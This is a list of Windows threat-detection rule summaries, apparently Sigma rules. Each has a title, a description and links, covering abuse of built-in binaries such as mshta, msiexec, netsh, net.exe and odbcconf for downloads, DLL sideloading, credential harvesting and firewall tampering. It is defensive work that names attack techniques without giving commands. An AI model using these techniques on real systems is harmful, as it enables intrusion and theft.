Detects potential sideloading of "mpclient.dll" by Windows Defender processes ("MpCmdRun" and "NisSrv") from their non-default directory. |
https://www.sentinelone.com/blog/living-off-windows-defender-lockbit-ransomware-sideloads-cobalt-strike-through-microsoft-security-tool |
File Download Via Windows Defender MpCmpRun.EXE |
Detects the use of Windows Defender MpCmdRun.EXE to download files |
https://web.archive.org/web/20200903194959/https://twitter.com/djmtshepana/status/1301608169496612866, https://lolbas-project.github.io/lolbas/Binaries/MpCmdRun/ |
Suspicious Msbuild Execution By Uncommon Parent Process |
Detects suspicious execution of 'Msbuild.exe' by a uncommon parent process |
https://app.any.run/tasks/abdf586e-df0c-4d39-89a7-06bf24913401/, https://www.echotrail.io/insights/search/msbuild.exe |
Windows Defender Definition Files Removed |
Adversaries may disable security tools to avoid possible detection of their tools and activities by removing Windows Defender Definition Files |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md, https://unit42.paloaltonetworks.com/unit42-gorgon-group-slithering-nation-state-cybercrime/ |
Potential Arbitrary Command Execution Using Msdt.EXE |
Detects processes leveraging the "ms-msdt" handler or the "msdt.exe" binary to execute arbitrary commands as seen in the follina (CVE-2022-30190) vulnerability |
https://twitter.com/nao_sec/status/1530196847679401984, https://app.any.run/tasks/713f05d2-fe78-4b9d-a744-f7c133e3fafb/, https://twitter.com/_JohnHammond/status/1531672601067675648 |
Suspicious Cabinet File Execution Via Msdt.EXE |
Detects execution of msdt.exe using the "cab" flag which could indicates suspicious diagcab files with embedded answer files leveraging CVE-2022-30190 |
https://twitter.com/nas_bench/status/1537896324837781506, https://github.com/GossiTheDog/ThreatHunting/blob/e85884abbf05d5b41efc809ea6532b10b45bd05c/AdvancedHuntingQueries/DogWalk-DiagCab, https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-9015912909545e72ed42cbac4d1e96295e8964579c406d23fd9c47a8091576a0, https://irsl.medium.com/the-trouble-with-microsofts-troubleshooters-6e32fc80b8bd |
Arbitrary File Download Via MSEDGE_PROXY.EXE |
Detects usage of "msedge_proxy.exe" to download arbitrary files |
https://lolbas-project.github.io/lolbas/Binaries/msedge_proxy/ |
Suspicious MSDT Parent Process |
Detects msdt.exe executed by a suspicious parent as seen in CVE-2022-30190 / Follina exploitation |
https://twitter.com/nao_sec/status/1530196847679401984, https://app.any.run/tasks/713f05d2-fe78-4b9d-a744-f7c133e3fafb/ |
Remotely Hosted HTA File Executed Via Mshta.EXE |
Detects execution of the "mshta" utility with an argument containing the "http" keyword, which could indicate that an attacker is executing a remotely hosted malicious hta file |
https://www.trendmicro.com/en_us/research/22/e/avoslocker-ransomware-variant-abuses-driver-file-to-disable-anti-Virus-scans-log4shell.html |
Wscript Shell Run In CommandLine |
Detects the presence of the keywords "Wscript", "Shell" and "Run" in the command, which could indicate a suspicious activity |
https://web.archive.org/web/20220830122045/http://blog.talosintelligence.com/2022/08/modernloader-delivers-multiple-stealers.html, https://blog.talosintelligence.com/modernloader-delivers-multiple-stealers-cryptominers-and-rats/ |
Suspicious JavaScript Execution Via Mshta.EXE |
Detects execution of javascript code using "mshta.exe". |
https://eqllib.readthedocs.io/en/latest/analytics/6bc283c4-21f2-4aed-a05c-a9a3ffa95dd4.html, https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218.005/T1218.005.md |
Potential LethalHTA Technique Execution |
Detects potential LethalHTA technique where the "mshta.exe" is spawned by an "svchost.exe" process |
https://codewhitesec.blogspot.com/2018/07/lethalhta.html |
Suspicious MSHTA Child Process |
Detects a suspicious process spawning from an "mshta.exe" process, which could be indicative of a malicious HTA script execution |
https://www.trustedsec.com/july-2015/malicious-htas/ |
MSHTA Suspicious Execution 01 |
Detection for mshta.exe suspicious execution patterns sometimes involving file polyglotism |
http://blog.sevagas.com/?Hacking-around-HTA-files, https://0x00sec.org/t/clientside-exploitation-in-2018-how-pentesting-has-changed/7356, https://learn.microsoft.com/en-us/previous-versions/dotnet/framework/data/xml/xslt/xslt-stylesheet-scripting-using-msxsl-script, https://medium.com/tsscyber/pentesting-and-hta-bypassing-powershell-constrained-language-mode-53a42856c997, https://twitter.com/mattifestation/status/1326228491302563846 |
Suspicious Mshta.EXE Execution Patterns |
Detects suspicious mshta process execution patterns |
https://en.wikipedia.org/wiki/HTML_Application, https://www.echotrail.io/insights/search/mshta.exe, https://app.any.run/tasks/34221348-072d-4b70-93f3-aa71f6ebecad/ |
DllUnregisterServer Function Call Via Msiexec.EXE |
Detects MsiExec loading a DLL and calling its DllUnregisterServer function |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218.007/T1218.007.md, https://lolbas-project.github.io/lolbas/Binaries/Msiexec/, https://twitter.com/_st0pp3r_/status/1583914515996897281 |
Suspicious MsiExec Embedding Parent |
Adversaries may abuse msiexec.exe to proxy the execution of malicious payloads |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218.007/T1218.007.md |
Suspicious Msiexec Execute Arbitrary DLL |
Adversaries may abuse msiexec.exe to proxy execution of malicious payloads.
Msiexec.exe is the command-line utility for the Windows Installer and is thus commonly associated with executing installation packages (.msi)
|
https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/msiexec, https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218.007/T1218.007.md, https://twitter.com/_st0pp3r_/status/1583914515996897281 |
Msiexec Quiet Installation |
Adversaries may abuse msiexec.exe to proxy execution of malicious payloads.
Msiexec.exe is the command-line utility for the Windows Installer and is thus commonly associated with executing installation packages (.msi)
|
https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/msiexec, https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218.007/T1218.007.md, https://twitter.com/_st0pp3r_/status/1583914244344799235 |
Suspicious Msiexec Quiet Install From Remote Location |
Detects usage of Msiexec.exe to install packages hosted remotely quietly |
https://www.microsoft.com/en-us/security/blog/2022/10/27/raspberry-robin-worm-part-of-larger-ecosystem-facilitating-pre-ransomware-activity/ |
Potential MsiExec Masquerading |
Detects the execution of msiexec.exe from an uncommon directory |
https://twitter.com/200_okay_/status/1194765831911215104 |
MsiExec Web Install |
Detects suspicious msiexec process starts with web addresses as parameter |
https://blog.trendmicro.com/trendlabs-security-intelligence/attack-using-windows-installer-msiexec-exe-leads-lokibot/ |
Arbitrary File Download Via MSOHTMED.EXE |
Detects usage of "MSOHTMED" to download arbitrary files |
https://github.com/LOLBAS-Project/LOLBAS/pull/238/files |
Arbitrary File Download Via MSPUB.EXE |
Detects usage of "MSPUB" (Microsoft Publisher) to download arbitrary files |
https://github.com/LOLBAS-Project/LOLBAS/pull/238/files |
Potential Process Injection Via Msra.EXE |
Detects potential process injection via Microsoft Remote Asssistance (Msra.exe) by looking at suspicious child processes spawned from the aforementioned process. It has been a target used by many threat actors and used for discovery and persistence tactics |
https://www.microsoft.com/security/blog/2021/12/09/a-closer-look-at-qakbots-latest-building-blocks-and-how-to-knock-them-down/, https://www.fortinet.com/content/dam/fortinet/assets/analyst-reports/ar-qakbot.pdf |
Detection of PowerShell Execution via Sqlps.exe |
This rule detects execution of a PowerShell code through the sqlps.exe utility, which is included in the standard set of utilities supplied with the MSSQL Server.
Script blocks are not logged in this case, so this utility helps to bypass protection mechanisms based on the analysis of these logs.
|
https://learn.microsoft.com/en-us/sql/tools/sqlps-utility?view=sql-server-ver15, https://lolbas-project.github.io/lolbas/OtherMSBinaries/Sqlps/, https://twitter.com/bryon_/status/975835709587075072 |
SQL Client Tools PowerShell Session Detection |
This rule detects execution of a PowerShell code through the sqltoolsps.exe utility, which is included in the standard set of utilities supplied with the Microsoft SQL Server Management studio.
Script blocks are not logged in this case, so this utility helps to bypass protection mechanisms based on the analysis of these logs.
|
https://github.com/LOLBAS-Project/LOLBAS/blob/8283d8d91552213ded165fd36deb6cb9534cb443/yml/OtherMSBinaries/Sqltoolsps.yml, https://twitter.com/pabraeken/status/993298228840992768 |
Suspicious Child Process Of SQL Server |
Detects suspicious child processes of the SQLServer process. This could indicate potential RCE or SQL Injection. |
Internal Research |
Suspicious Child Process Of Veeam Dabatase |
Detects suspicious child processes of the Veeam service process. This could indicate potential RCE or SQL Injection. |
https://labs.withsecure.com/publications/fin7-target-veeam-servers |
Potential MSTSC Shadowing Activity |
Detects RDP session hijacking by using MSTSC shadowing |
https://twitter.com/kmkz_security/status/1220694202301976576, https://github.com/kmkz/Pentesting/blob/47592e5e160d3b86c2024f09ef04ceb87d204995/Post-Exploitation-Cheat-Sheet |
New Remote Desktop Connection Initiated Via Mstsc.EXE |
Detects the usage of "mstsc.exe" with the "/v" flag to initiate a connection to a remote server.
Adversaries may use valid accounts to log into a computer using the Remote Desktop Protocol (RDP). The adversary may then perform actions as the logged-on user.
|
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1021.001/T1021.001.md#t1021001---remote-desktop-protocol, https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/mstsc |
Mstsc.EXE Execution With Local RDP File |
Detects potential RDP connection via Mstsc using a local ".rdp" file |
https://www.blackhillsinfosec.com/rogue-rdp-revisiting-initial-access-methods/, https://web.archive.org/web/20230726144748/https://blog.thickmints.dev/mintsights/detecting-rogue-rdp/ |
Suspicious Mstsc.EXE Execution With Local RDP File |
Detects potential RDP connection via Mstsc using a local ".rdp" file located in suspicious locations. |
https://www.blackhillsinfosec.com/rogue-rdp-revisiting-initial-access-methods/, https://web.archive.org/web/20230726144748/https://blog.thickmints.dev/mintsights/detecting-rogue-rdp/ |
Mstsc.EXE Execution From Uncommon Parent |
Detects potential RDP connection via Mstsc using a local ".rdp" file located in suspicious locations. |
https://www.blackhillsinfosec.com/rogue-rdp-revisiting-initial-access-methods/, https://web.archive.org/web/20230726144748/https://blog.thickmints.dev/mintsights/detecting-rogue-rdp/ |
Msxsl.EXE Execution |
Detects the execution of the MSXSL utility. This can be used to execute Extensible Stylesheet Language (XSL) files. These files are commonly used to describe the processing and rendering of data within XML files.
Adversaries can abuse this functionality to execute arbitrary files while potentially bypassing application whitelisting defenses.
|
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1220/T1220.md, https://lolbas-project.github.io/lolbas/OtherMSBinaries/Msxsl/ |
Remote XSL Execution Via Msxsl.EXE |
Detects the execution of the "msxsl" binary with an "http" keyword in the command line. This might indicate a potential remote execution of XSL files. |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1220/T1220.md, https://lolbas-project.github.io/lolbas/OtherMSBinaries/Msxsl/ |
New Firewall Rule Added Via Netsh.EXE |
Detects the addition of a new rule to the Windows firewall via netsh |
https://web.archive.org/web/20190508165435/https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-RAT-and-Staging-Report.pdf |
Suspicious Program Location Whitelisted In Firewall Via Netsh.EXE |
Detects Netsh command execution that whitelists a program located in a suspicious location in the Windows Firewall |
https://www.virusradar.com/en/Win32_Kasidet.AD/description, https://www.hybrid-analysis.com/sample/07e789f4f2f3259e7559fdccb36e96814c2dbff872a21e1fa03de9ee377d581f?environmentId=100 |
RDP Connection Allowed Via Netsh.EXE |
Detects usage of the netsh command to open and allow connections to port 3389 (RDP). As seen used by Sarwent Malware |
https://labs.sentinelone.com/sarwent-malware-updates-command-detonation/ |
Firewall Rule Deleted Via Netsh.EXE |
Detects the removal of a port or application rule in the Windows Firewall configuration using netsh |
https://app.any.run/tasks/8bbd5b4c-b82d-4e6d-a3ea-d454594a37cc/ |
Firewall Disabled via Netsh.EXE |
Detects netsh commands that turns off the Windows firewall |
https://www.winhelponline.com/blog/enable-and-disable-windows-firewall-quickly-using-command-line/, https://app.any.run/tasks/210244b9-0b6b-4a2c-83a3-04bd3175d017/, https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.004/T1562.004.md#atomic-test-1---disable-microsoft-defender-firewall |
Netsh Allow Group Policy on Microsoft Defender Firewall |
Adversaries may modify system firewalls in order to bypass controls limiting network usage |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.004/T1562.004.md#atomic-test-3---allow-smb-and-rdp-on-microsoft-defender-firewall, https://learn.microsoft.com/en-us/troubleshoot/windows-server/networking/netsh-advfirewall-firewall-control-firewall-behavior |
Firewall Configuration Discovery Via Netsh.EXE |
Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1016/T1016.md#atomic-test-2---list-windows-firewall-rules, https://ss64.com/nt/netsh.html |
Firewall Rule Update Via Netsh.EXE |
Detects execution of netsh with the "advfirewall" and the "set" option in order to set new values for properties of a existing rule |
https://ss64.com/nt/netsh.html |
Potential Persistence Via Netsh Helper DLL |
Detects the execution of netsh with "add helper" flag in order to add a custom helper DLL. This technique can be abused to add a malicious helper DLL that can be used as a persistence proxy that gets called when netsh.exe is executed.
|
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.007/T1546.007.md, https://github.com/outflanknl/NetshHelperBeacon, https://web.archive.org/web/20160928212230/https://www.adaptforward.com/2016/09/using-netshell-to-execute-evil-dlls-and-persist-on-a-host/ |
New Network Trace Capture Started Via Netsh.EXE |
Detects the execution of netsh with the "trace" flag in order to start a network capture |
https://blogs.msdn.microsoft.com/canberrapfe/2012/03/30/capture-a-network-trace-without-installing-anything-capture-a-network-trace-of-a-reboot/, https://klausjochem.me/2016/02/03/netsh-the-cyber-attackers-tool-of-choice/ |
New Port Forwarding Rule Added Via Netsh.EXE |
Detects the execution of netsh commands that configure a new port forwarding (PortProxy) rule |
https://www.fireeye.com/blog/threat-research/2019/01/bypassing-network-restrictions-through-rdp-tunneling.html, https://adepts.of0x.cc/netsh-portproxy-code/, https://www.dfirnotes.net/portproxy_detection/ |
RDP Port Forwarding Rule Added Via Netsh.EXE |
Detects the execution of netsh to configure a port forwarding of port 3389 (RDP) rule |
https://www.fireeye.com/blog/threat-research/2019/01/bypassing-network-restrictions-through-rdp-tunneling.html |
Harvesting Of Wifi Credentials Via Netsh.EXE |
Detect the harvesting of wifi credentials using netsh.exe |
https://blog.malwarebytes.com/threat-analysis/2020/04/new-agenttesla-variant-steals-wifi-credentials/ |
Suspicious Group And Account Reconnaissance Activity Using Net.EXE |
Detects suspicious reconnaissance command line activity on Windows systems using Net.EXE
Check if the user that executed the commands is suspicious (e.g. service accounts, LOCAL_SYSTEM)
|
https://redcanary.com/blog/how-one-hospital-thwarted-a-ryuk-ransomware-outbreak/, https://thedfirreport.com/2020/10/18/ryuk-in-5-hours/, https://research.nccgroup.com/2022/08/19/back-in-black-unlocking-a-lockbit-3-0-ransomware-attack/ |
Unmount Share Via Net.EXE |
Detects when when a mounted share is removed. Adversaries may remove share connections that are no longer useful in order to clean up traces of their operation |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.005/T1070.005.md |
Start Windows Service Via Net.EXE |
Detects the usage of the "net.exe" command to start a service using the "start" flag |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1569.002/T1569.002.md |
New User Created Via Net.EXE |
Identifies the creation of local users via the net.exe command. |
https://eqllib.readthedocs.io/en/latest/analytics/014c3f51-89c6-40f1-ac9c-5688f26090ab.html, https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1136.001/T1136.001.md |
New User Created Via Net.EXE With Never Expire Option |
Detects creation of local users via the net.exe command with the option "never expire" |
https://thedfirreport.com/2022/07/11/select-xmrig-from-sqlserver/ |
Suspicious Manipulation Of Default Accounts Via Net.EXE |
Detects suspicious manipulations of default accounts such as 'administrator' and 'guest'. For example 'enable' or 'disable' accounts or change the password...etc |
https://www.trellix.com/en-sg/about/newsroom/stories/threat-labs/lockergoga-ransomware-family-used-in-targeted-attacks.html, https://redacted.com/blog/bianlian-ransomware-gang-gives-it-a-go/, https://www.microsoft.com/security/blog/2022/09/07/profiling-dev-0270-phosphorus-ransomware-operations/ |
Windows Admin Share Mount Via Net.EXE |
Detects when an admin share is mounted using net.exe |
https://drive.google.com/file/d/1lKya3_mLnR3UQuCoiYruO3qgu052_iS_/view |
Stop Windows Service Via Net.EXE |
Detects the stopping of a Windows service via the "net" utility. |
https://ss64.com/nt/net-service.html |
Password Provided In Command Line Of Net.EXE |
Detects a when net.exe is called with a password in the command line |
Internal Research |
Windows Internet Hosted WebDav Share Mount Via Net.EXE |
Detects when an internet hosted webdav share is mounted using the "net.exe" utility |
https://drive.google.com/file/d/1lKya3_mLnR3UQuCoiYruO3qgu052_iS_/view |
Windows Share Mount Via Net.EXE |
Detects when a share is mounted using the "net.exe" utility |
https://drive.google.com/file/d/1lKya3_mLnR3UQuCoiYruO3qgu052_iS_/view |
System Network Connections Discovery Via Net.EXE |
Adversaries may attempt to get a listing of network connections to or from the compromised system they are currently accessing or from remote systems by querying for information over the network. |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1049/T1049.md#atomic-test-1---system-network-connections-discovery |
Share And Session Enumeration Using Net.EXE |
Detects attempts to enumerate file shares, printer shares and sessions using "net.exe" with the "view" flag. |
https://eqllib.readthedocs.io/en/latest/analytics/b8a94d2f-dc75-4630-9d73-1edc6bd26fff.html, https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1018/T1018.md |
Nltest.EXE Execution |
Detects nltest commands that can be used for information discovery |
https://jpcertcc.github.io/ToolAnalysisResultSheet/details/nltest.htm |
Potential Arbitrary Code Execution Via Node.EXE |
Detects the execution node.exe which is shipped with multiple software such as VMware, Adobe...etc. In order to execute arbitrary code. For example to establish reverse shell as seen in Log4j attacks...etc |
http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html, https://www.sprocketsecurity.com/resources/crossing-the-log4j-horizon-a-vulnerability-with-no-return, https://www.rapid7.com/blog/post/2022/01/18/active-exploitation-of-vmware-horizon-servers/, https://nodejs.org/api/cli.html |
Potential Recon Activity Via Nltest.EXE |
Detects nltest commands that can be used for information discovery |
https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc731935(v=ws.11), https://thedfirreport.com/2021/08/16/trickbot-leads-up-to-fake-1password-installation/, https://thedfirreport.com/2020/10/18/ryuk-in-5-hours/, https://book.hacktricks.xyz/windows/basic-cmd-for-pentesters, https://research.nccgroup.com/2022/08/19/back-in-black-unlocking-a-lockbit-3-0-ransomware-attack/, https://eqllib.readthedocs.io/en/latest/analytics/03e231a6-74bc-467a-acb1-e5676b0fb55e.html, https://redcanary.com/blog/how-one-hospital-thwarted-a-ryuk-ransomware-outbreak/, https://github.com/redcanaryco/atomic-red-team/blob/5360c9d9ffa3b25f6495f7a16e267b719eba2c37/atomics/T1482/T1482.md#atomic-test-2---windows---discover-domain-trusts-with-nltest |
Node Process Executions |
Detects the execution of other scripts using the Node executable packaged with Adobe Creative Cloud |
https://twitter.com/mttaggart/status/1511804863293784064 |
Network Reconnaissance Activity |
Detects a set of suspicious network related commands often used in recon stages |
https://thedfirreport.com/2022/02/07/qbot-likes-to-move-it-move-it/ |
Nslookup PowerShell Download Cradle - ProcessCreation |
Detects suspicious powershell download cradle using nslookup. This cradle uses nslookup to extract payloads from DNS records |
https://twitter.com/Alh4zr3d/status/1566489367232651264 |
Suspicious Usage Of Active Directory Diagnostic Tool (ntdsutil.exe) |
Detects execution of ntdsutil.exe to perform different actions such as restoring snapshots...etc. |
https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc731620(v=ws.11), https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/espionage-asia-governments |
Invocation of Active Directory Diagnostic Tool (ntdsutil.exe) |
Detects execution of ntdsutil.exe, which can be used for various attacks against the NTDS database (NTDS.DIT) |
https://jpcertcc.github.io/ToolAnalysisResultSheet/details/ntdsutil.htm |
Driver/DLL Installation Via Odbcconf.EXE |
Detects execution of "odbcconf" with "INSTALLDRIVER" which installs a new ODBC driver. Attackers abuse this to install and run malicious DLLs. |
https://lolbas-project.github.io/lolbas/Binaries/Odbcconf/, https://web.archive.org/web/20191023232753/https://twitter.com/Hexacorn/status/1187143326673330176, https://www.hexacorn.com/blog/2020/08/23/odbcconf-lolbin-trifecta/ |
Suspicious Driver/DLL Installation Via Odbcconf.EXE |
Detects execution of "odbcconf" with the "INSTALLDRIVER" action where the driver doesn't contain a ".dll" extension. This is often used as a defense evasion method. |
https://lolbas-project.github.io/lolbas/Binaries/Odbcconf/, https://web.archive.org/web/20191023232753/https://twitter.com/Hexacorn/status/1187143326673330176, https://www.hexacorn.com/blog/2020/08/23/odbcconf-lolbin-trifecta/ |
New DLL Registered Via Odbcconf.EXE |
Detects execution of "odbcconf" with "REGSVR" in order to register a new DLL (equivalent to running regsvr32). Attackers abuse this to install and run malicious DLLs. |
https://learn.microsoft.com/en-us/sql/odbc/odbcconf-exe?view=sql-server-ver16, https://lolbas-project.github.io/lolbas/Binaries/Odbcconf/, https://redcanary.com/blog/raspberry-robin/, https://web.archive.org/web/20191023232753/https://twitter.com/Hexacorn/status/1187143326673330176, https://www.hexacorn.com/blog/2020/08/23/odbcconf-lolbin-trifecta/, https://www.trendmicro.com/en_us/research/17/h/backdoor-carrying-emails-set-sights-on-russian-speaking-businesses.html |
Odbcconf.EXE Suspicious DLL Location |
Detects execution of "odbcconf" where the path of the DLL being registered is located in a potentially suspicious location. |
https://learn.microsoft.com/en-us/sql/odbc/odbcconf-exe?view=sql-server-ver16, https://www.trendmicro.com/en_us/research/17/h/backdoor-carrying-emails-set-sights-on-russian-speaking-businesses.html, https://securityintelligence.com/posts/raspberry-robin-worm-dridex-malware/ |
Potentially Suspicious DLL Registered Via Odbcconf.EXE |
Detects execution of "odbcconf" with the "REGSVR" action where the DLL in question doesn't contain a ".dll" extension. Which is often used as a method to evade defenses. |
https://learn.microsoft.com/en-us/sql/odbc/odbcconf-exe?view=sql-server-ver16, https://lolbas-project.github.io/lolbas/Binaries/Odbcconf/, https://www.trendmicro.com/en_us/research/17/h/backdoor-carrying-emails-set-sights-on-russian-speaking-businesses.html |
Response File Execution Via Odbcconf.EXE |
Detects execution of "odbcconf" with the "-f" flag in order to load a response file which might contain a malicious action. |
https://learn.microsoft.com/en-us/sql/odbc/odbcconf-exe?view=sql-server-ver16, https://lolbas-project.github.io/lolbas/Binaries/Odbcconf/, https://www.cybereason.com/blog/threat-analysis-report-bumblebee-loader-the-high-road-to-enterprise-domain-control, https://www.hexacorn.com/blog/2020/08/23/odbcconf-lolbin-trifecta/ |
Suspicious Response File Execution Via Odbcconf.EXE |
Detects execution of "odbcconf" with the "-f" flag in order to load a response file with a non-".rsp" extension. |
https://learn.microsoft.com/en-us/sql/odbc/odbcconf-exe?view=sql-server-ver16, https://lolbas-project.github.io/lolbas/Binaries/Odbcconf/, https://www.trendmicro.com/en_us/research/17/h/backdoor-carrying-emails-set-sights-on-russian-speaking-businesses.html |
Uncommon Child Process Spawned By Odbcconf.EXE |
Detects an uncommon child process of "odbcconf.exe" binary which normally shouldn't have any child processes. |
https://learn.microsoft.com/en-us/sql/odbc/odbcconf-exe?view=sql-server-ver16, https://lolbas-project.github.io/lolbas/Binaries/Odbcconf/, https://medium.com/@cyberjyot/t1218-008-dll-execution-using-odbcconf-exe-803fa9e08dac |
Potential Arbitrary File Download Using Office Application |
Detects potential arbitrary file download using a Microsoft Office application |
https://lolbas-project.github.io/lolbas/OtherMSBinaries/Winword/, https://lolbas-project.github.io/lolbas/OtherMSBinaries/Powerpnt/, https://lolbas-project.github.io/lolbas/OtherMSBinaries/Excel/, https://medium.com/@reegun/unsanitized-file-validation-leads-to-malicious-payload-download-via-office-binaries-202d02db7191 |
Potential Excel.EXE DCOM Lateral Movement Via ActivateMicrosoftApp |
Detects suspicious child processes of Excel which could be an indicator of lateral movement leveraging the "ActivateMicrosoftApp" Excel DCOM object.
|
https://posts.specterops.io/lateral-movement-abuse-the-power-of-dcom-excel-application-3c016d0d9922, https://github.com/grayhatkiller/SharpExShell, https://learn.microsoft.com/en-us/office/vba/api/excel.xlmsapplication |
Potentially Suspicious Office Document Executed From Trusted Location |
Detects the execution of an Office application that points to a document that is located in a trusted location. Attackers often used this to avoid macro security and execute their malicious code. |
Internal Research, https://twitter.com/Max_Mal_/status/1633863678909874176, https://techcommunity.microsoft.com/t5/microsoft-365-blog/new-security-hardening-policies-for-trusted-documents/ba-p/3023465, https://twitter.com/_JohnHammond/status/1588155401752788994 |
OneNote.EXE Execution of Malicious Embedded Scripts |
Detects the execution of malicious OneNote documents that contain embedded scripts.
When a user clicks on a OneNote attachment and then on the malicious link inside the ".one" file, it exports and executes the malicious embedded script from specific directories.
|
https://bazaar.abuse.ch/browse/tag/one/ |
Suspicious Microsoft OneNote Child Process |
Detects suspicious child processes of the Microsoft OneNote application. This may indicate an attempt to execute malicious embedded objects from a .one file. |
https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-e34e43eb5666427602ddf488b2bf3b545bd9aae81af3e6f6c7949f9652abdf18, https://micahbabinski.medium.com/detecting-onenote-one-malware-delivery-407e9321ecf0 |
Outlook EnableUnsafeClientMailRules Setting Enabled |
Detects an attacker trying to enable the outlook security setting "EnableUnsafeClientMailRules" which allows outlook to run applications or execute macros |
https://www.fireeye.com/blog/threat-research/2018/12/overruled-containing-a-potentially-destructive-adversary.html, https://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook?slide=44, https://support.microsoft.com/en-us/topic/how-to-control-the-rule-actions-to-start-an-application-or-run-a-macro-in-outlook-2016-and-outlook-2013-e4964b72-173c-959d-5d7b-ead562979048 |
Suspicious Execution From Outlook Temporary Folder |
Detects a suspicious program execution in Outlook temp folder |
Internal Research |
Suspicious Outlook Child Process |
Detects a suspicious process spawning from an Outlook process. |
https://www.hybrid-analysis.com/sample/465aabe132ccb949e75b8ab9c5bda36d80cf2fd503d52b8bad54e295f28bbc21?environmentId=100, https://mgreen27.github.io/posts/2018/04/02/DownloadCradle.html |
Suspicious Remote Child Process From Outlook |
Detects a suspicious child process spawning from Outlook where the image is located in a remote location (SMB/WebDav shares). |
https://github.com/sensepost/ruler, https://www.fireeye.com/blog/threat-research/2018/12/overruled-containing-a-potentially-destructive-adversary.html, https://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook?slide=49 |
Suspicious Binary In User Directory Spawned From Office Application |
Detects an executable in the users directory started from one of the Microsoft Office suite applications (Word, Excel, PowerPoint, Publisher, Visio) |
https://blog.morphisec.com/fin7-not-finished-morphisec-spots-new-campaign, https://www.virustotal.com/gui/file/23160972c6ae07f740800fa28e421a81d7c0ca5d5cab95bc082b4a986fbac57 |
Potential Arbitrary DLL Load Using Winword |
Detects potential DLL sideloading using the Microsoft Office winword process via the '/l' flag. |
https://github.com/D4Vinci/One-Lin3r/blob/9fdfa5f0b9c698dfbd4cdfe7d2473192777ae1c6/one_lin3r/core/liners/windows/cmd/dll_loader_word.py |
Suspicious Microsoft Office Child Process |
Detects a suspicious process spawning from one of the Microsoft Office suite products (Word, Excel, PowerPoint, Publisher, Visio, etc.) |
https://www.hybrid-analysis.com/sample/465aabe132ccb949e75b8ab9c5bda36d80cf2fd503d52b8bad54e295f28bbc21?environmentId=100, https://mgreen27.github.io/posts/2018/04/02/DownloadCradle.html, https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/, https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/02bcbfc2bfb8b4da601bb30de0344ae453aa1afe/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml, https://github.com/splunk/security_content/blob/develop/detections/endpoint/office_spawning_control.yml, https://twitter.com/andythevariable/status/1576953781581144064?s=20&t=QiJILvK4ZiBdR8RJe24u-A, https://www.elastic.co/security-labs/exploring-the-ref2731-intrusion-set, https://github.com/elastic/detection-rules/blob/c76a39796972ecde44cb1da6df47f1b6562c9770/rules/windows/defense_evasion_execution_msbuild_started_by_office_app.toml, https://www.vmray.com/analyses/2d2fa29185ad/report/overview.html, https://app.any.run/tasks/c903e9c8-0350-440c-8688-3881b556b8e0/ |
Potential Mpclient.DLL Sideloading Via OfflineScannerShell.EXE Execution |
Detects execution of Windows Defender "OfflineScannerShell.exe" from its non standard directory.
The "OfflineScannerShell.exe" binary is vulnerable to DLL side loading and will load any DLL named "mpclient.dll" from the current working directory.
|
https://lolbas-project.github.io/lolbas/Binaries/OfflineScannerShell/ |
PDQ Deploy Remote Adminstartion Tool Execution |
Detect use of PDQ Deploy remote admin tool |
